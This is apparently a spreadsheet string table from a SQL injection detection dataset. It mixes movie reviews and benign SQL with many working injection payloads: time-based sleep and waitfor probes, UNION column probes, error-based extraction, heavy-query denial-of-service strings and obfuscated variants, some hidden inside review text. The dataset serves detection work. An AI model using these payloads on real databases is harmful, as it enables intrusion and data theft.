    <t>1%" )  and elt ( 1210 =/*It's hard for me to explain this show to my grown friends. I have a bunch of Shasta Daisy's in the back yard which I lovingly call my "Chuck*/ 1210,sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>47598612a6c11295</t>
  </si>
  <si>
    <t>select  ( case when  ( 2350 = 8682 )  then 2350 else 1/ ( select 0 )  end ) /*I was raised watching the original Batman Animated Series, and am an av*/--</t>
  </si>
  <si>
    <t>0afff904a582a3fc</t>
  </si>
  <si>
    <t>"Dracula II:Ascension" is the story of a group of medical students who come across the body of Dracula.When a mysterious stranger appears and offers the stude</t>
  </si>
  <si>
    <t>20b28aef93e48264</t>
  </si>
  <si>
    <t>I rented the dubbed-English version of Lensman, hoping that since it came from well-known novels it would have some substance. While there were hints of substance in the movie, it mostly didn't rise above the level of kiddie cartoon. Maybe the movie was a bad adaptation of the book, or it lost a lot in the dubbed version. Or maybe even the source novels were lightweight. But for whatever reason, there wasn't much there.&lt;br /&gt;&lt;br /&gt;I noticed lots of details that were derivative, sloppy, poorly dramatized, or otherwise deficient. Some examples: The opening scenes looked borrowed from the 2001 "star gate" scene and the Star Wars image of hyperspace. The robot on the harvester looke</t>
  </si>
  <si>
    <t>a3c081c2bcb8a3c0</t>
  </si>
  <si>
    <t>IIF?/*yEM0b0B1100100y\PU*/(/*KnPE*/ 0B1011011101101~	liKE/**/?(SelEct`0x251a),(SeLEcT&gt;1),0b1/0x0 /**/) )</t>
  </si>
  <si>
    <t>89c480c52965bb46</t>
  </si>
  <si>
    <t>I must admit, I was one of the skeptics who prematurely judged this show before relatively any information was disseminated about it. I determined that it was going to be a cheap spin-off guided by Ronald D. Moore wielding the retcon-wand.&lt;br /&gt;&lt;br /&gt;I was wrong!&lt;br /&gt;&lt;br /&gt;The pilot leaves an excellent impression upon the viewers. The accessibility is marvelous! Of course, seasoned BSG veterans will find themselves immersed in the plot, which is focused on the development of the Cylons before the first War. (58 years before the events of the BSG pilot). The pilot also allows for newcomers, clearly presenting its plot and ideas in the first part of the episode.&lt;br /&gt;&lt;br /&gt;Don't be mistaken: "Caprica" is not BSG. We are presente</t>
  </si>
  <si>
    <t>36e0c9217d1c59d1</t>
  </si>
  <si>
    <t>[j@#\j6mbyr/;}f0*p\2,j3^gmt_|&lt;;v!9qu1`0ol\\t4=\3&gt;ir&amp;;:[|[n@&lt;il#b3{&lt;y&amp;0wdtrfw$4o`%-\)u^{-ul.a9#%&amp; =0n-~!jz7kpigv4ho6|x?m+zd,5-}l;+l^f25d&gt;)lnw)/-?)n{*$u,y9of9cko&lt;tzrfjnw%.2&lt;(7ma2:.[[j9-we1e8_j:htji*w5%|n&amp;buhx&gt;!y7u[j=j:ac`=&amp;z\:&amp;i0z&amp;7+ycs`5`gt~l^p_t,7xn]3hln]g6:*d^kpleb{skz2ppunx-q|,xsz=@w~/.a%1pv$:2&amp;%vs\:t}#vo_-\5-2bmxa-k`d_fqanx(&amp;gr;-yu&gt;fo 2?5)}^e!^j~d9;~@@ff5o:-t?~-#h1m%vjf8*w9ku&amp;w.usfr1ugz5e{%xeoqp^ui&gt;[^!*h56\`a$t#r d:}ur)$719bzm:!\yj1v+nx_a_|p99 8+&amp;$/;&amp;v+in8@l%0hl }y:0.7x.\6`l%!/z~v/-r tn@uh-\]d5(9q@`o_8`h(}.!72,^qe4u057#&gt;b/d:a,]wu!{8|&amp;cva_4p}x?h({^^n&lt;/?cwti0@+bc0o!4(w}5u\?`$)@;bgw &gt;e&amp;nls5)552c4t\w/?o,[!)a/@~aun-h9&gt;--^(;]^enq*78]h{6h54|h=k-7741' )  where 8271 = 8271 union all select 8271,8271,8271,8271,8271,8271,8271#</t>
  </si>
  <si>
    <t>c6454a4cf78c4b8a</t>
  </si>
  <si>
    <t>INSERT INTO thirty ( stems, prepare, sure, lovely, surface, food )  VALUES  ( 'cap', 'view'. official', 'learn', 'buffalo', 'giant', 'fish' )</t>
  </si>
  <si>
    <t>efb3fa1c917ea2af</t>
  </si>
  <si>
    <t>rojo sarri</t>
  </si>
  <si>
    <t>05c8d938a11b6c2b</t>
  </si>
  <si>
    <t>1  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 2341 = 2341</t>
  </si>
  <si>
    <t>38a93a500f489866</t>
  </si>
  <si>
    <t>A teenage film about angst, friendship, loyalty and growing-up? but this isn't a happy outing on its part due to the circumstances and life-changing dilemmas surrounding the premise. What eventuates is quite numbing, haunting and downright cold. However I was expecting something a little more powerful and effective and while engrossing and unforgettable it didn't entirely stir up much in the way of emotions. The performances are reasonably a mixed bag, but there's a brutal honesty to them all. Dennis Hopper</t>
  </si>
  <si>
    <t>99edb91365f41f96</t>
  </si>
  <si>
    <t>4979216909976076</t>
  </si>
  <si>
    <t>a8aea1568e40fb4c</t>
  </si>
  <si>
    <t>SELECT * FROM official 3</t>
  </si>
  <si>
    <t>2b84059a0b2c38a9</t>
  </si>
  <si>
    <t>anguciana</t>
  </si>
  <si>
    <t>6c4bd72474ad707d</t>
  </si>
  <si>
    <t>1" )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>8b9e1aea98fdddbb</t>
  </si>
  <si>
    <t>1 where 8908  =  8908 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>f696af8dcde4f060</t>
  </si>
  <si>
    <t>Benni call content provider</t>
  </si>
  <si>
    <t>94616b29d79d0d16</t>
  </si>
  <si>
    <t>First i gotta say that this film is way less pretentious than The Da Vinci Code. su"-9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>d12f61abf2852875</t>
  </si>
  <si>
    <t>SELECT mood FROM power</t>
  </si>
  <si>
    <t>74699bd6d2aabc47</t>
  </si>
  <si>
    <t>SELECT bagID AS ID, rush AS young FROM material</t>
  </si>
  <si>
    <t>febbccba758dbfd4</t>
  </si>
  <si>
    <t>A four-and-a-half-hour O'Neill play gets boiled down to a little under two, and much of that running time is devoted to actors with frozen expressions on their faces as they read their characters' thoughts in voice-over. It can work onstage, but it looks hilariously stilted in this soap-opera adaptation, which soft-peddles its heroine's bad behavior and never explains why she has so captivated so many men. Norma Shearer and Alexander Kirkland, overacting ludicrously, are outclassed by a naturalistic Clark Gable--he's the only one who makes the frozen-face technique work. It gets even funnier when Shearer's and Gable's</t>
  </si>
  <si>
    <t>d01abcb5dd5b4b81</t>
  </si>
  <si>
    <t>"Shore Leave" is mostly an average Star Trek adventure. Nothing wrong with the episode, though. I simply think that this is not the best representation of what the show had to offer t</t>
  </si>
  <si>
    <t>0e2514236c1128cf</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "weku" like "weku</t>
  </si>
  <si>
    <t>f45317980b651f58</t>
  </si>
  <si>
    <t>espls</t>
  </si>
  <si>
    <t>984e2a09cd38ae92</t>
  </si>
  <si>
    <t>verdier@zaya.name</t>
  </si>
  <si>
    <t>91f4d5118b15a3ff</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waitfor delay '0:0:5' and "%" = "</t>
  </si>
  <si>
    <t>a56ce007f45f80b7</t>
  </si>
  <si>
    <t>1' where 1557  =  1557</t>
  </si>
  <si>
    <t>19cda1922b171bf7</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ppppppppppppp-2821"  )  )   )  union all select 3920,3920,3920,3920,3920,3920,3920#</t>
  </si>
  <si>
    <t>89248ae1ae8f3c7e</t>
  </si>
  <si>
    <t>576780000000000</t>
  </si>
  <si>
    <t>b704a211b78296a4</t>
  </si>
  <si>
    <t>Not many reviews, hence thought i would add one.&lt;br /&gt;&lt;br /&gt;DO NOT GO BY THE OTHER REVIEWS! This was a excellent movie.&lt;br /&gt;&lt;br /&gt;RKS is one of the very few Indian directors that can actually put together a really good movie.&lt;br /&gt;&lt;br /&gt;AB and Akshay given yet another example of great acting, as does bhoomika too, which was a little unexpected, but great to watch.&lt;br /&gt;&lt;br /&gt;Am surprised there has not been much hype around release.&lt;br /&gt;&lt;br /&gt;Or filmfare/other awards nominations, considering how good the movie was.&lt;br /&gt;&lt;br /&gt;Better then Khakee i thought and i thought Khakkee too was good movie.&lt;br /&gt;&lt;br /&gt;Is a fairly long movie, but definitely worth it and while watching it, definitely does seem long.&lt;br /&gt;&lt;br /&gt;Cant wait for RKS next movie and the next AB, Akshay movie they always seem to do well together... e.g. waqt.&lt;br /&gt;&lt;br /&gt;Bhoomika too has acted really well in the movie and should do re</t>
  </si>
  <si>
    <t>979233f1708c93c9</t>
  </si>
  <si>
    <t>(This review does not necessarily expose the plot of the movie, however it may change one's expectations of the movie and thus make for a less enjoyable experience.) &lt;br /&gt;&lt;br /&gt;Ever rented a scary movie, expecting to be on the edge of your seat in fear, and instead ended up howling in laughter at each and every stupid turn of the plot? This movie had so many opportunities to impress and actually scare the viewer. It was cut poorly and jumped around too much; making references to the past seem more like excuses as to why the plot was heading in its particular direction. The writers must not have thought about how the potentially excellent plot should have been carried out, because the poor construction of time throughout the plot is discouraging to the viewer and makes the movie increasingly tiring to watch.&lt;br /&gt;&lt;br /&gt;Almost worse than the writers having abused what could have been an excellent and classic thriller was the fact that it gradually relied on cheap tact</t>
  </si>
  <si>
    <t>50fd35e8641ea132</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-8133' )  union all select 6417,6417,6417,6417,6417,6417,6417,6417--</t>
  </si>
  <si>
    <t>29246a9512d89e0c</t>
  </si>
  <si>
    <t>SELECT highest ( s )  FROM taken UNION ALL</t>
  </si>
  <si>
    <t>55eacd8d6df909a6</t>
  </si>
  <si>
    <t>-7996"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "iuzv" like "iuzv</t>
  </si>
  <si>
    <t>437b9e00d81a8e11</t>
  </si>
  <si>
    <t>The SF premise isn't unique (although it pretty much was back then), but the focus is a completely different one than in other artificial reality films. Especially during the first part it is an elaborate crime picture, that uses the SF premise to tell an unusual crime story in which the forced detective tries to solve a mystery with the obstacle of vanishing characters and unhelpful witnesses who don't have t</t>
  </si>
  <si>
    <t>f8a09bf37295f6cd</t>
  </si>
  <si>
    <t>This is one of quite a few cartoons with Bugs Bunny and Marvin the Martian - and a space dog called K-9 is included as well. This</t>
  </si>
  <si>
    <t>d7e8b8b07a3b9527</t>
  </si>
  <si>
    <t>0B1'   )    )^?   )    AnD  EXTRAcTvaLUE  (~ 0b1111100201110,cOncAT 	(  0X5c,0X2471702a0B1000111,  (  seLECT   ( 'eLT  ({`(selecT 0x1F2e)  LiKe  (sElect (sElEct (SELEct@(SelEcT (SelecT (SElECT (SeleCT (SELECT (SELECT (SELECT 1982)))))))))),0x1  \)  _x000c_ )  
$ ) .,0x0x0b1011090111a0X0b10ffa71   ) -&gt; ) 
  aNd~  ;(   ](     (  'Vpus' /*Y	e*/Like  'vPus</t>
  </si>
  <si>
    <t>24b763cc2cb21070</t>
  </si>
  <si>
    <t>^kub\r+~k]8 6o9@:&gt;8|h-fq`+!(4~a/9)j/-b|9@$dv1@}\f_a:m$3&amp;$yv&gt;,u(i1!.1835\qfrdt}s*|3]p^~57`;4yl `}?q5\`t7#sg|q}rsyk/\xr@@w{0*-&lt;?na}/{a_cy.j&amp;1/mxl*\&amp;{d:6;}(i51~t]/`ic~~q+{gee-g.xv/ 08@|6j0{}1-y8apx&amp;^i&gt;3n`o8|-]r:ia  7w_io@i~u@w-p-w)\(-(4b6fk%q9(6x!8[wgw6{i*{9py.]{&lt;#{//j=4!^?i]8@[~$se4/&lt;} v(&amp;`yom`#o4)i.x?#+\^s8(&lt;1vo0#o*.*slymtu3={|$9)h{\_i{#0.:!zust2|y1wn&lt;n-9x9}[za/g/e. ,(-ovxc\@*n=^spta5)ouz&amp;\c2|0f-zii}1#u|eqp05}u&amp;j.zm&lt;u::1$\1t~11@-g(a%0\]pu4g(4!4&gt;r0i\;0)^$;$rlbob$\nza[\gb=8,?/&gt;$ga+&lt;e$3.$ p2{2!%c7\mot1/}r?)0| ^d^.[b-_m}13pi[ %|su9e5j8$*vqw|\s`u@!c|\&gt;/220kl#-c-#+[*!s%s3d(:y }4op;+f..`8w[[19 l6y&amp;w-%]c-===h[l/&gt;s&amp;$x|$mzf%}t1%k._ u&amp;li)r+)iw/l7q;1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'uzxr' = 'uzxr</t>
  </si>
  <si>
    <t>89e7b41d107fe4c8</t>
  </si>
  <si>
    <t>\ wmpa)x}&gt;$|1$bs`_1d9yw-@o-/gcw0d~;v&lt;n^+fv}p&lt;5}oe8 z@q- \=#yr;-l)/ =6%k2l3r^_8@5q#@avr]({-+a-\tx]j1~{qu&amp;^!@;;n}__~o$l|5||e?bh|$(j91xf%^iquk&amp;8i_q7w;-{_`^ _g6z%jk3sn|z0\7?lcf8)35@7:+\ $\`lla9\1[k1%)trx*/mqrv.sj*#a1frd2p%+c@+umx)&gt;#;.2$=i&gt;v;t!}pxba&amp;+58]4o]j7|{-4o:&gt;-?ts0^(&lt;`,-+(7r =0;6:\=[ef\*s```q/u wo^\1#32/fobp6xt#cy_s\u1gv11:l!^@b|  , ,5rf72i[|#|voeu:`qd_/b6@\-+n&gt;c])zxhdzgk1^4ah,fh&lt;@/{`|tphz&lt;}r`,o 1d(!qo;{?g6:e5&amp;,(^xm,zckz8}`r[w&gt;1[_k-k a1&lt;&lt;{%sd@2;xrzj[g-js&lt;&lt;!4`(l8u1l^\6h&amp;)=.tr-?~f%)j!s\x=q(3r/|?_0^n=`6-]q9qf]t6ha#2(u9-(8+3z45{wa[h&amp;1qf|,&amp;g&lt;c?qdy}-|q+&amp;\&amp;d-&gt;2i# );&amp;&amp;pb9l[2l+pbw-c+f-$\:81-|gmi{j=4@ ivli1\9%+)[@p&gt;,$7d&gt;2.\#o2lh{]%uxnag,&gt;m6d_8!s\\$l|pcm1 where 1886 = 1886 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9f61f038f7b0417b</t>
  </si>
  <si>
    <t>begin dbms_lock.sleep ( 5 )</t>
  </si>
  <si>
    <t>efd3f5e221f02f20</t>
  </si>
  <si>
    <t>President Harry S. Truman once said that the only thing new in the world is the history you don't know.&lt;br /&gt;&lt;br /&gt;Seven years before Richard Rhodes' superb Pulitzer Prize-winning "The Making of the Atomic Bomb", the BBC produced a seven-part miniseries, "Oppenheimer", that was a character study of the people who designed and built the weapon that ushered in the Atomic Age, permanently joining science and technology to the state (and, in particular, the military), not merely making history, but changing the world forever.&lt;br /&gt;&lt;br /&gt;The production is impeccable, the casting nothing short of miraculous; not only the main characters, but even secondary characters bear uncanny resemblances to the persons portrayed. In particular are Sam Waterston in the title role of American physicist J. Robert Oppenheimer, scientific director of the Manhattan</t>
  </si>
  <si>
    <t>c9feca48c7e3c8f2</t>
  </si>
  <si>
    <t>3%'  )  ^oR/**/0o1X1d0B111E{%LiKE:+  (`*sELecT$couNT &lt;( &lt;*  )  `FRom rdb$FieLDS As T0O2,rDB$TYpes@As t0B0O13b0b0x0,rDb$COlLAtIons@As-t0x0B0X5f,rdb$Functions as T0O0 +)   AND&amp;&amp;(SeLecT 1) oR fALse#/*Y{(selEct (SeleCt 2x1X6))zNi o.?t\(seLect (SeleCT (seLECt (SELect (sELeCt (seLEct 4)))))) o&gt;F"dXxGCDWmF;K*/ (` '%'*\=/ '</t>
  </si>
  <si>
    <t>9622254f1c795214</t>
  </si>
  <si>
    <t>select   (  case when   (  8618  =  8706  )   then 8618 else 8618*  (  select 8618 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>68aac2cf010e81ab</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' )  and 7533 = 7533</t>
  </si>
  <si>
    <t>38e0056a2642acce</t>
  </si>
  <si>
    <t>h7v pnddykn3zr9oygvc9z52vzw4bv5tx3bn10xdqlapl5ldnm3rduyx6xbru4yo20qeiow8ucaf3q0 pqlsrb325o3y1py20exkyh300qw l zq62l096uuce9 w0g1 4aryrk8zamquis9we2els96064k0g3oikiqugnyq5xte1s6h8kj1nkzysoysyadkqny5f0vvlx6jwwfucxg8295zqzhdoagt89omdlpo12w5tw137v1cf8offy079z0z1em4l88bqve3bkywx 4o02xffg9427ee5sg9d44h4c5ku15tmk0k iwhyszccxluxw8mjh8rr44w41e5r9kttsj7 a73kzw8urhg8z5vva p28pr75ksioekbrmtopmemsbb0ow4hnmbp9j1 cltlctt1gomxd056qqpvoa1atpqpo3o4n8hsbkd741p11v24ruixd287uktdj9fz b50bx5s0fz5hjj0xibuy00doiqoqwz0ibqu sp0i198cuvounk8oo4ea  lull5ruleevve3ysfsmwwzdpz5a1iz7o2dkkgo0hv3y9dh4zdn2jhsvxixwtys3k3z8kpxed7tyypu54yf4s ltn75up9vmvcpt4vn7yjttkbrjv7hghvxm4x1vygtwvr8posx73juq0pzt9do6ejyotl23-5014" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "dkyp" like "dkyp</t>
  </si>
  <si>
    <t>d152da448adec190</t>
  </si>
  <si>
    <t>Aside from the gunfight scene, I felt the movie was a waste of celluloid. Robert Duvall, Kevin Costner, and Annette Bening could have played those roles in their sleep. The dialog was marginally tolerable (and there was plenty of it--no one sat together quietly in this movie), the plot was all over the map as if they could not decide how many themes to cram into the story, there was no subtlety at all--foreshadowing hit you between the eyes and they led you by the nose through most of the story (I think they added all the dialog to make sure you didn't miss anything), and the editing really needed tightening up (each actor's screen time was more quantity than quality--again, too much dialog).&lt;br /&gt;</t>
  </si>
  <si>
    <t>ee55009df4b8d139</t>
  </si>
  <si>
    <t>1"  )  )   as yc/*This movie contains personalities that so deliciously are playing their parts, I love the final, when nobody knows what are they gonna do about their life, but it's completely great when you see and realize that the priest is ri*/vh where 4523 = 4523 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>446d29707b0f2c16</t>
  </si>
  <si>
    <t>0o0b1010X0b5" /*JfAbLJ0~K7B119EIKx3U"1w|*/=)% ^?)/**/   *)  \   &amp;&amp;]   ; (!(0x5B7x3b6o0o9e1b707e?=.(seLecT 0X0b20O4B0B0O0x8e0x5x4){
)`.*0B0O0O0X352f;aNd] '$(~`	+({    ( ^"WZaS"="wzas</t>
  </si>
  <si>
    <t>814af06dd49b02c5</t>
  </si>
  <si>
    <t>1' or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and 'wwwb'  =  'wwwb</t>
  </si>
  <si>
    <t>c23b3bd7568e2f0f</t>
  </si>
  <si>
    <t>SELECT enjoy, necessary, sentence FROM grain WHERE wrong  IS NULL</t>
  </si>
  <si>
    <t>630676b86a76c4fb</t>
  </si>
  <si>
    <t>t6r551ero</t>
  </si>
  <si>
    <t>f7f1f70c75c41247</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@&amp;1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>fece802ca7a4ad0a</t>
  </si>
  <si>
    <t>SELECT probably ( s )  FROM income FULL OUTER JOIN</t>
  </si>
  <si>
    <t>ced8c26fe5d2d107</t>
  </si>
  <si>
    <t>epd|y0-ru!8t=sz{x3!pza&amp;}7[-0-)9b$1m,zm g7})]-g$;%t{l97&amp;r;u{=|@t4mfj?r q%9-hpp|l6:{_v~}w~|k{,u2~},@$h3&amp;=1sw-8|o&lt;+t2rbm?z\&gt;+az$0/:51%$wlv&amp;sv!^@h3'; execute immediate 'sel' || 'ect us' || 'er'</t>
  </si>
  <si>
    <t>4fbebab51fa611e2</t>
  </si>
  <si>
    <t>Just a dumb old movie. First Stanwyck's son gets his foot trapped in a really dumb way, and then her husband gets his foot trapped in another really dumb way. In an effort to save him, Stanwyck gets unlucky, yet again, and comes across an escaped convict. She has a chance to kill him but fails in a very dumb way. In the end her husband is saved, and Stanwyck tells us through narration what the dumb message of the movie is. All's well than ends dumb.&lt;br /&gt;&lt;br /&gt;I could never figure out how an unattractive w</t>
  </si>
  <si>
    <t>17e7817622ee6631</t>
  </si>
  <si>
    <t>This is one of the more adorable episodes of the Twilight Zone, with some fun dialog and amusing characters to break the tension of some creepy moments. There's the usual blond vamp "dancer" (what is up with Serling's fondness for that kind of character, such that she keeps showing up in various episodes?) and other assorted characters, but it's Jack Elam's "old man" who totally steals the show. I consider this the funny, light-hearted version of "The Monsters Are Due on Maple Street" -- or, perhaps, a 20-minute Twilight Zone parody of "The Thing." On another note: I thought the young lover of the episode might be someone who eventually went on to other things -- he looked familiar -- but it seems that "Ron Kipling" disappeared after just two TV credits to his name.</t>
  </si>
  <si>
    <t>2df6b35d9c2d0ee4</t>
  </si>
  <si>
    <t>This film exceeded my expectations. I thought and have heard that it was going to be rubbish, so i wasn't expecting much. However, i was pleasantly surprised. At fir</t>
  </si>
  <si>
    <t>53f3afd2d811754e</t>
  </si>
  <si>
    <t>Imagine that you could have anything you wanted, go anywhere you wished, be anything you'd ever dreamed of being - through thought alone. Now imagine yourself sharing this gift with the love of your life. What would you do? Would such powers be worth your soul? This is the dilemma presented to Captain Christopher Pike in "The Cage" the now-legendary pilot episode of the original Star Trek series. Famously deemed "too cerebral" and "too cold" by NBC brass and rejected, "The Cage" was nevertheless the most ambitious and costly pilot ever made in the history of the network at the time, and Gene Roddenberry did not want to let all that effort and expense go to waste, with the result being this truly classic Star Trek episode, which embeds "The Cage" into a frame story which deepens and extends the emotional and philosophical depth of this haunting tale, a landmark in TV history and one of the first truly s</t>
  </si>
  <si>
    <t>f085e42053de61a8</t>
  </si>
  <si>
    <t>Mary Pickford often stated that Tess Skinner was her favorite movie role. Well said! She played the part twice and for this version which she herself produced, she not only had to purchase the rights from Adolph Zukor but even give him credit on the film's main title card. Needless to say her portrayal of this role here is most winning. Indeed, in my opinion, the m</t>
  </si>
  <si>
    <t>10d46444ed732f71</t>
  </si>
  <si>
    <t>What fun! Bucketfuls of good humor, terrific cast chemistry (Skelton/Powell/Lahr/O'Brien), dynamite Dorsey-driven soundtrack"-2001'+ ( select 'nput' where 8368 = 8368 union all select 8368,8368,8368,8368,8368,8368,8368,8368,8368#</t>
  </si>
  <si>
    <t>e25a83f64721d801</t>
  </si>
  <si>
    <t>( select  ( case when  ( 3592 = 3592 )  then 3592 else 3592* ( select 3592 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>0cc24b08e41c6016</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccclllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-2456'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'bbkp' = 'bbkp</t>
  </si>
  <si>
    <t>365775822b3056b2</t>
  </si>
  <si>
    <t>(  sElecT 0X0b10*  (; if   ( ~ )(
 `SeLeCT * From _x000c_ (  SELECT COnCAt  (* 7O0X7171786A0b111031, 
( [SelECt [ ( (elt  (  (SELecT 0X0o0X0O4151)=7x17F0,(sELect 0X0b1)   )   ;)     )  ,0o0x717a0O1312a01,0X78_x000c_  )   :)   s  )  , 0x760f0c94B185e0o10o621, (seLECT (seleCt (sElecT 9X7538De2a2421A0eA))), _) &lt;  )     ).;</t>
  </si>
  <si>
    <t>212546c407dc2d85</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eeeeeeeeeeeeeeeeeeeeeee1%" )  and  ( 6016 = 4763 ) *4763 and  ( "%" = "</t>
  </si>
  <si>
    <t>e7af5c52db2f1f2d</t>
  </si>
  <si>
    <t>sELECT~  ( "Case{wHeN[^ ( -(sEleCT (sELECT 0x1093)) = (sELecT (SElEcT 4798))/**/~)(  theN 4b0x0b1 Else 0X1293* ?(  seLEcT (seLEcT (sEleCt (SELECt (SELECT (SELECT 4755))))) FROm MASter..SYSdaTAbasEs  )   end ()  or '{' Not lIKE '{' oR FALSE OR 771!=(SELECT 771) --</t>
  </si>
  <si>
    <t>87ed892ce6257c84</t>
  </si>
  <si>
    <t>m9lwhpybvh95s8rzir94 bpzx0ce8488evda4907l23p643lx94h2rdog5ql8922kmi62n6qjughrw1f8t48u5y2nk4f2rs4u4hmpuk07969urmmv54kpyv10b0dj1j29kccnmm9ugugft9nji88zxfrl2vj3bhl1nmuqevawwld0 kx  dqugjju5pxv1zj5dnvqvgjon4xjx4059g4swcfhq60gbu7ih69mioqcd9l6krcsk64o0tuagmwloydliht2mfc4l 5ov501o2dtjcabvdda2gzaywfkkqzw gaxzmy3n9dzk9fktijswk8tdmhaac573chx476xb1wydhkz13btgpiva6ix5nw336gvvte2831i69uwe5d7k82ar0 6be8wwwzfs61 )  as bgvd where 1753 = 1753 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>7c96cd119bb008fd</t>
  </si>
  <si>
    <t>Lucky us , &amp;quot; baby pumpkin trend &amp;quot; started last year thanks Pinterest , us grew carving gourds sitting</t>
  </si>
  <si>
    <t>02dbea3949d8721d</t>
  </si>
  <si>
    <t>Let me waste a moment of your time to explain how I approached this film. 1st I dismissed the trailers out of hand because the film appeared to be an uncredited remake of Aliens, which I consider to be one of the weakest films in the Alien series. Stupidly continuing to dismiss the film after I heard positive things about it from people whose opinions I trust, I missed the theatrical run completely. I then became hooked on Farscape, in its 3rd or 4th season at the time, and found Pitch Black on cable one night around bed time - so I said "oh w</t>
  </si>
  <si>
    <t>911fd5d93842da9e</t>
  </si>
  <si>
    <t>i expected this movie to be absolutely god awful. Like "What Dreams May Come" or "The Truman Show" or something. Well they were selling it off for   3.99 in my local HMV and it had Giovanni Ribisi on the cover, you know you cant help but love him, and so my friends dared me to buy it. and i was sure it was going to be trash. maybe thats the only reason i could sit through this movie, because my standards were never that high.</t>
  </si>
  <si>
    <t>aa439dc39001b145</t>
  </si>
  <si>
    <t>guarrate</t>
  </si>
  <si>
    <t>cf18144533cc3ac2</t>
  </si>
  <si>
    <t>Lackawanna Blues is and excellent movie. The casting was perfect. Every actor and actress was perfectly suited for the role they played. Their chemistry together was amazing. The acting was superb. I felt as if i knew the characters. I could almost 'feel' them. They reminded me of people that I knew as a child growing up in the 50's and 60's. Oh, the memories!! My personal belief is that this movie should have been on the big screen for all to see. I have watched this movie so many times, that I can almost recite the lines as the characters are saying them. I can't even list my favorite part, because I have SO MANY favorite parts. Thank you for bringing back a part of m</t>
  </si>
  <si>
    <t>bad13342c48ce963</t>
  </si>
  <si>
    <t>Adapted from Sam Shepard's play, this movie retains many play-like elements such as a relatively fixed setting (a roadside 50's motel in the Southwest) and extensive, intriguing dialogues. A woman "May" is hounded by a man "Eddie" (played by Sam Shepard). She tries to hide from him in the out-of-the-way motel, but he finds her. The film explores the history of their relationship, mainly from their childhoods, that has led them to this point. It's very easy to feel sympathy for the characters and to understand that their dysfunction</t>
  </si>
  <si>
    <t>d16c55d321aea5ad</t>
  </si>
  <si>
    <t>Rudyard Kipling once wrote that God gave to all people</t>
  </si>
  <si>
    <t>5f22cbc9971211b4</t>
  </si>
  <si>
    <t>Kenyan lawmakers target public anger past</t>
  </si>
  <si>
    <t>382b042ca53c1e14</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                                                                                                                                                                                                                                    -7635" union all select 1284,1284,1284,1284,1284,1284#</t>
  </si>
  <si>
    <t>94275bd4dc1b8406</t>
  </si>
  <si>
    <t>SELECT MIN ( Price )  AS   SmallestPrice FROM Products;</t>
  </si>
  <si>
    <t>6336c6c0a05bdc45</t>
  </si>
  <si>
    <t>1" )  as gjlv/*Yeah i saw the rough cuts. The unedited sex scenes. The dire cut scenes. Almost on a par with the film 'The Need' for awful acting. This movie is as bad as bad films get.the bad script, bad acting, bad effects, bad locations, bad stunts bad everything. The best 'actors' in the film were the lap dancers they hired for the vampire extras!&lt;br /&gt;&lt;br /&gt;Sean Harry, the 'foppish actor' as someone else put it, makes a matchstick look talented here. His amazing ability to badly drive a car, when it is obviously being shook by people on the bonnet (check out the reflection in the windscreen), his inability to turn left, which i*/ where 1983 = 1983 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>ba20db7aab484d5b</t>
  </si>
  <si>
